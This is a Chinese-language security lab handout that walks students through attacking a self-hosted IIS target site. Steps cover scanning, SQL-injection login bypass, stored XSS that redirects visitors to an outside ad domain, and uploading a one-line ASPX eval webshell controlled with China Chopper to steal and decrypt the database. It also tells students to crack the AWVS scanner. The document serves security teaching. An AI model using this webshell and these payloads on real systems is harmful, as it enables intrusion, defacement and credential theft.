实训1-利用Web漏洞入侵网站并控制服务器
实训目的
深入理解网络无安全的思想。
了解局域网查看软件Lansee的使用方法。
了解端口扫描软件AdvancedPortScanner的使用方法。
了解Web后台扫描软件御剑的使用方法。
了解网站漏洞扫描工具AWVS的使用方法。
了解Webshell连接工具中国菜刀的使用方法。
掌握端口及漏洞扫描的基本知识,能够利用工具进行扫描工作。
掌握网站入侵的一般流程。
实训准备及注意事项
1.硬件:装有Windows操作系统的计算机1台(关闭防火墙和杀毒软件),接入某局域网。
2.软件:LanSee、AdvancedPortScanner、御剑后台扫描工具、网站漏洞扫描工具AWVS、中国菜刀。
3.严格按照实验步骤进行实验,实验结果以截图的形式进行保留。
4.实验后务必将相关工具软件从机器彻底删除,避免工具被恶意利用影响网络正常使用。
实训背景
局域网查看工具可扫描指定网段并探查共享文件,同时监控网络内所有主机的在线情况。
漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用的漏洞的一种安全检测(渗透攻击)行为。配备漏洞扫描系统,网络管理人员可以定期的进行网络安全检测服务,安全检测可帮助客户最大可能的消除安全隐患,尽可能早地发现安全漏洞并进行修补,有效的利用已有系统,优化资源,提高网络的运行效率。
端口扫描是指向目标主机发送一组端口扫描消息,并了解其提供的计算机网络服务类型(这些网络服务均与端口号相关)。端口扫描是计算机解密高手喜欢的一种方式。攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上,端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。扫描器是一种自动检测远程或本地主机安全性弱点的程序,通过使用扫描器你可以不留痕迹的发现远程服务器的各种TCP端口的分配及提供的服务和它们的软件版本。这就能让我们间接的或直观的了解到远程主机所存在的安全问题。
后台扫描即搜寻网站可能的后台入口,字典扫描是常用的一种Web目录扫描方法,类似于暴力破解,扫描结果是否理想取决于字典的大小。
实训准备 在windows上部署一个IIS web服务
安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服
注意:如果.net环境安装不全可在CMD下输入:
"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
实训任务1 网络探查与端口扫描
局域网探查工具LanSee
1、其他主机在局域网中共享一些文件。
2、运行网络查看工具LanSee.exe。
3、点击设置,输入要探查的ip地址段。
4、点击开始进行探查,观察探查结果。
端口扫描工具AdvancedPortScanner
1、打开AdvancedPortScanner软件,在主界面中选择Use range选项,填入准备扫描的网段或主机IP。
2、选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。
3、设置完成后点击ok回到主界面,单机Scan按钮,经过一段时间的等待,将显示扫描结果。
实训任务2 Web扫描
网站后台扫描工具御剑
1、打开御剑后台扫描工具,输入要扫描的网站域名。
2、线程选择2-4个,点击开始扫描。
3、等待扫描结果。
网站漏洞扫描工具AWVS
1、安装AWVS软件并破解。
2、利用target finder功能扫描一个IP地址是否提供web服务,是否开启80、443等端口。
3、利用web scanner功能扫描一个网站(自己搭建的靶站),观察扫描结果(包括漏洞告警、网站结构、cookies等信息)
4、利用site crawler功能爬取网站的文件和目录
实训任务3 漏洞利用
网站后台绕过
1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。
2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。
3、输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。
4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。
5、进入网站后台管理界面。
网站的后台登录网址是什么
网站的默认管理员用户名和密码是什么
输入什么内容可以绕过登陆验证直接进入后台
找到网站中适合提交恶意代码的位置,截图或拍照
提交游戏广告跳转代码
篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。
2、提交代码<script>alert("test")</script>,使用另外的主机访问此网站,观察效果。
3、提交代码(代码中的网址可更改):
<script>window.location.href="http://d.mytanwan.com"</script>,观察效果。
实训任务4 上传后门程序(木马)并控制目标主机
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
在网站前台或后台中找到一个可以上传文件的位置
上传文件后,访问该文件的路径(或地址)是什么
利用菜刀连接木马,将数据库文件复制到本地打开
利用在线解密网站对数据库中的加密密码进行解密
实验总结
- 端口扫描的目的是什么?
端口扫描通常是为了发现计算机上开放的端口,从而了解该计算机提供的网络服务类型以及可能存在的安全漏洞。
以下是端口扫描的主要目的:
1. **发现开放的端口**:通过端口扫描,可以识别目标计算机上哪些端口是开放的,并了解这些端口所提供的服务。这有助于系统管理员对系统进行维护和监控。
2. **安全评估**:端口扫描可以用来评估远程或本地主机的安全性。通过检测开放的端口,可以发现潜在的安全弱点,比如过时的软件版本或者配置不当的服务。
3. **预防性维护**:端口扫描有助于及时发现和修复系统漏洞,防止未经授权的访问和数据泄露。
4. **攻击准备**:不幸的是,端口扫描也被恶意攻击者用于准备网络攻击。他们通过扫描来收集信息,找到可利用的漏洞以发起攻击。
5. **网络管理**:网络管理员可能使用端口扫描工具来确保网络中的所有设备都按照预期运行,并且没有未授权的服务在运行。
6. **合规性检查**:某些行业或政府规定要求定期进行安全审计,端口扫描可以作为这些审计的一部分,以确保遵守相关的安全标准和法规。
7. **研究和学习**:对于学习网络安全的人来说,端口扫描是一个了解不同类型网络服务及其运作方式的基本工具。
总之,端口扫描是网络安全领域的一个重要工具,无论是对于防御者还是攻击者,它都提供了关键的信息。然而,需要注意的是,未经授权的端口扫描可能违反法律,因此在进行端口扫描时应确保具有相应的权限和合法理由。
- 漏洞扫描的目的是什么?
**漏洞扫描的主要目的是提高系统的安全性和可靠性**。具体来看,漏洞扫描有以下几个关键目的:
1. **发现安全漏洞和缺陷**:漏洞扫描能够揭示系统、网络或应用程序中可能存在的安全漏洞和缺陷。通过定期进行漏洞扫描,组织可以及时发现并修复这些问题,从而减少潜在的安全风险。
2. **节省企业成本**:虽然初始投资包括设备和软件的购买成本,但长期来看,漏洞扫描可以帮助企业节省因安全事故导致的更高成本。它减少了设备管理和维护的成本,同时避免了因漏洞未及时发现而可能引发的损失。
3. **提供明确的修补目标**:漏洞扫描报告通常会提供具体的修补建议,这样客户就不需要花费大量时间分析哪些漏洞需要处理以及如何处理。这简化了漏洞分析过程,并允许将主要精力集中在漏洞修复上。
4. **提高安全意识**:定期进行漏洞扫描可以提高组织内部人员的安全意识,确保安全管理不被忽视,即使在忙碌的日常工作中也能保持对安全性的关注。
5. **风险评估**:漏洞是计算总风险的重要变量。通过识别漏洞,组织可以更好地评估和管理信息安全风险,从而保护资产价值不受威胁。
6. **降低人工参与和技术门槛**:漏洞扫描工具化使得识别漏洞的过程更加自动化,减少了人工参与的需求和技术门槛,使得非专业人员也能够有效地识别和处理安全问题。
综上所述,漏洞扫描是维护网络安全的重要手段,它不仅有助于及时发现和修复漏洞,还能够提高组织的整体安全意识和安全管理水平。
- Webshell是什么?
**Webshell是一种恶意脚本,用于远程控制服务器**。
Webshell,通常被称为网页后门,是一种恶意代码,它允许攻击者通过Web方式远程控制受感染的服务器。这种脚本通常以网页文件的形式存在,可以执行系统命令、窃取数据等操作。Webshell的危害相当大,因为它为黑客提供了一个方便的操作界面,使得他们对服务器的控制更加隐蔽和深入。
以下是Webshell的一些特点和相关信息:
- **特点**:Webshell能够执行各种命令和操作,包括但不限于文件上传下载、系统命令执行、数据库访问等。
- **危害**:它可以被用来进行数据窃取、网站内容篡改、分布式拒绝服务攻击(DDoS)等恶意活动。
- **防范方法**:为了防止Webshell攻击,需要采取一系列的安全措施,包括定期更新系统和应用程序、设置复杂的文件权限、使用安全的编程模式、进行定期的安全审计和漏洞扫描等。
- **分类**:Webshell可以根据其功能和使用的技术进行分类,例如PHP Webshell、ASP Webshell、JSP Webshell等。
- **隐藏技巧**:为了逃避检测,Webshell可能会使用各种技术来隐藏自己的存在,比如编码、加密或者利用服务器上的正常文件和程序。
综上所述,了解Webshell的工作原理和防御策略对于维护网络安全至关重要。任何运行Web服务的系统都可能成为Webshell的攻击目标,因此必须采取适当的预防措施来保护服务器不受侵害。